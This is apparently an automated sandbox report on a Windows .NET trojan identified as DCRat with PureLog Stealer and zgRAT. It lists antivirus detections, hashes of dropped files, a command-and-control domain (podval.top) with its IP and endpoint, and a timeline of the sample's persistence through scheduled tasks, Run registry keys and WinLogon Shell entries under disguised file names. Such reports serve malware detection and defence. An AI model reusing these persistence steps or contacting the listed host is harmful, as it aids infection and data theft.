Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph: ID: 1467031, Sample: 62b1bf60394248d2c743ec6df09..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe | 100% | Avira | HEUR/AGEN.1323342
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\FUSHtkHk.log | 100% | Avira | HEUR/AGEN.1300079
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Recovery\llflCdrMcgGB.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\jjSkKJFG.log | 100% | Avira | HEUR/AGEN.1300079
C:\Recovery\llflCdrMcgGB.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\PDlWdMMS.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\rUKsZmvt.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | 100% | Joe Sandbox ML
C:\Recovery\llflCdrMcgGB.exe | 100% | Joe Sandbox ML
C:\Recovery\llflCdrMcgGB.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\PDlWdMMS.log | 100% | Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\wlyrJHCD.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\AHphtSeX.log | 100% | Joe Sandbox ML
C:\Users\user\Desktop\rUKsZmvt.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\7-Zip\Lang\upfc.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\llflCdrMcgGB.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AHphtSeX.log | 8% | ReversingLabs
C:\Users\user\Desktop\CUcqaUVf.log | 17% | ReversingLabs
C:\Users\user\Desktop\FUSHtkHk.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PDlWdMMS.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\YPnuykix.log | 17% | ReversingLabs
C:\Users\user\Desktop\jjSkKJFG.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\rUKsZmvt.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wlyrJHCD.log | 8% | ReversingLabs
C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://podval.top/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php | 0% | Avira URL Cloud | safe
http://podval.top | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
podval.top | 188.114.97.3 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | Avira URL Cloud: safe | unknown
http://podval.top/ | upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | false | URL Reputation: safe | unknown
http://podval.top | upfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.97.3 | podval.top | European Union | | 13335 | CLOUDFLARENETUS | true

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467031
Start date and time: 2024-07-03 16:41:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@42/58@1/1
EGA Information:
• Successful, ratio: 22.2%
HCA Information: Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, Sgrmuserer.exe, schtasks.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PID 1472 because it is empty
                                • Execution Graph export aborted for target 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PID 7996 because it is empty
                                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7196 because it is empty
                                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7364 because it is empty
                                • Execution Graph export aborted for target llflCdrMcgGB.exe, PID 7296 because it is empty
                                • Execution Graph export aborted for target llflCdrMcgGB.exe, PID 8152 because it is empty
                                • Execution Graph export aborted for target upfc.exe, PID 6764 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                Time      Type             Description
                                10:42:09  API Interceptor  2168872x Sleep call for process: upfc.exe modified
                                16:42:00  Task Scheduler   Run new task: upfc path: "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:42:01  Task Scheduler   Run new task: upfcu path: "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:42:03  Task Scheduler   Run new task: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab path: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:03  Task Scheduler   Run new task: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6 path: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:03  Task Scheduler   Run new task: llflCdrMcgGB path: "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:03  Task Scheduler   Run new task: llflCdrMcgGBl path: "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:03  Task Scheduler   Run new task: StartMenuExperienceHost path: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:03  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:42:04  Task Scheduler   Run new task: StartMenuExperienceHostS path: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:11  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:20  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:28  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:36  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:42:44  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:52  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:43:00  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:43:08  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:43:16  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:43:24  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:43:32  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:43:49  Autostart        Run: WinLogon Shell "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:43:57  Autostart        Run: WinLogon Shell "C:\Recovery\llflCdrMcgGB.exe"
                                16:44:05  Autostart        Run: WinLogon Shell "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                Match                               Associated Sample Name / URL  Detection  Threat Name
                                C:\Users\user\Desktop\AHphtSeX.log  Vg46FzGtNo.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    6Z4Q4bREii.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    BbaXbvOA7D.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    cL7A9wGE3w.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    j05KsN2280.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    2lR1Spui9w.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    b8khu7cOny.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    hnCn8gE6NH.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    l4R8w1Q8lC.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                                    yF4L47gYLd.exe                malicious  DCRat, PureLog Stealer, zgRAT
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):154
                                                    Entropy (8bit):5.72287826517413
                                                    Encrypted:false
                                                    SSDEEP:3:mm3xh0oLaLCWYMIiTzXIE7fqzSEqTEI0ZcgBiG0m1zJ/As88h/EBArCMUxcJ5:mmBqdIifXPft83cYDH/AFa02
                                                    MD5:B9A2A12C63F87F9BAB05FE1BA859AEEF
                                                    SHA1:E9F38EE202F6975E13BA61F94ADE174813047448
                                                    SHA-256:D7009E1F0F4685A88D69A253EF611052E646FDB430390C9DB53E22AD468AEF51
                                                    SHA-512:E24F602ADCAC629C11087781AF30FD230C4DCEF80948CF78BE1E823491ECBC5DE21EA050A00C5C274379974AA9CD7A7DA1CE31F4B06B681871B760F40D42390B
                                                    Malicious:false
                                                    Preview:9rCcHIrTDVZdGvwKMXRDujMqhrgB3KAAC1zvmmG0Bd7erm18a7EH3sYafV5alpZ2VYaO6AhkRaCQlr940il6F2GUdZQQqqPVDEJSMmCaZe0cpHyxWBjDEdxcSFugtR3lLrNgiqsOfLhkBnoVkd3pGLRkRq
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1168
                                                    Entropy (8bit):4.448520842480604
                                                    Encrypted:false
                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                    Malicious:false
                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.912573812782283
                                                    Encrypted:false
                                                    SSDEEP:48:6CmdtFxZ8RxeOAkFJOcV4MKe28d4dZvqBH3uulB+hnqXSfbNtm:cyxvxVx9AvkpTkZzNt
                                                    MD5:707BBE530438ABD168AC55A01E36E76A
                                                    SHA1:FEF3C858D781FB0749A426E008820C6E90570B16
                                                    SHA-256:27712AB94F0571F97AFEEFB59EBA8708015D956D811DC4B0CCEEA74DAD43B806
                                                    SHA-512:9E105C83FFBA1C9FC20F028D8E5CF5D1E6CC4013F15A207CB67D3D9240976876B4D790F8FFAA940A155488C9E96741B028C28FA1B83A01487CFA0B3F53522C60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (910), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):910
                                                    Entropy (8bit):5.905591865684524
                                                    Encrypted:false
                                                    SSDEEP:24:XmM4dDGyu1kb7xm60iYswI8d/MiTLfnt4sAG1jiFEQg7d7k06:+16kb7xm1jIsVPt4XG1jiNg7tV6
                                                    MD5:3A3D7869D8944FFFB319B9BB32F08710
                                                    SHA1:C30671C1F0F3DB0220F467D0B62BCEF9FB4A14E9
                                                    SHA-256:B1D0F5C991BA5CDA6D316EC07F3400DD04518DB29E0784544CAD0C8D4A30429D
                                                    SHA-512:ACE056342A78F0C83B2AE2E3594F3AC6951F902DE5DA54CFF2F953E02F1492039981407213D319E89F00AF4F79DCA401DED29D8D3538E12A04B4C60D2AE03CFE
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):223
                                                    Entropy (8bit):5.738464717581
                                                    Encrypted:false
                                                    SSDEEP:6:3zAzAPsRJnJH1jJy1wI+QQfEmBDwWpdXEShusu2:3/UR9Ji+QOvBD6Su12
                                                    MD5:9218D670D3C592AF326D0042E5FCE7D1
                                                    SHA1:5F1CD4F2D18BBD970261FC2623F6332405783EF4
                                                    SHA-256:54BA74B6170231CE6EA9C2B26DF856F314450C39689230C995985DEE886CC0AA
                                                    SHA-512:CAFE8FDF8063DEF8648DD54DB388A54C076BE3D6A2E4AD5A5A1968EFAAC0CC8262F608EDB4E8E231D9D2D9CDD4941BFD12A160043E24F9F3327190642DBA4063
                                                    Malicious:false
                                                    Preview:7bklt5mmEtRve1W3sL6WYqkz8oZARFJ7baf4Wy1FnGUbXtqfn104KXzR1umEflU9jTTDWch4U0sRWIbP84WaPPxDlNClLxjBvU2EZmILU6kToh5tTXGlO4tTfQcIZ5shQqfBQWzWvLGTpdYDSTSxq8x1liiIJ9vYNDC7B3d6itzDyaoC1Y0Gn50S3oarxqMvarGmaaCY0VP6JuDK4gRvJouRMuEXdvI
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):277
                                                    Entropy (8bit):5.793605819173178
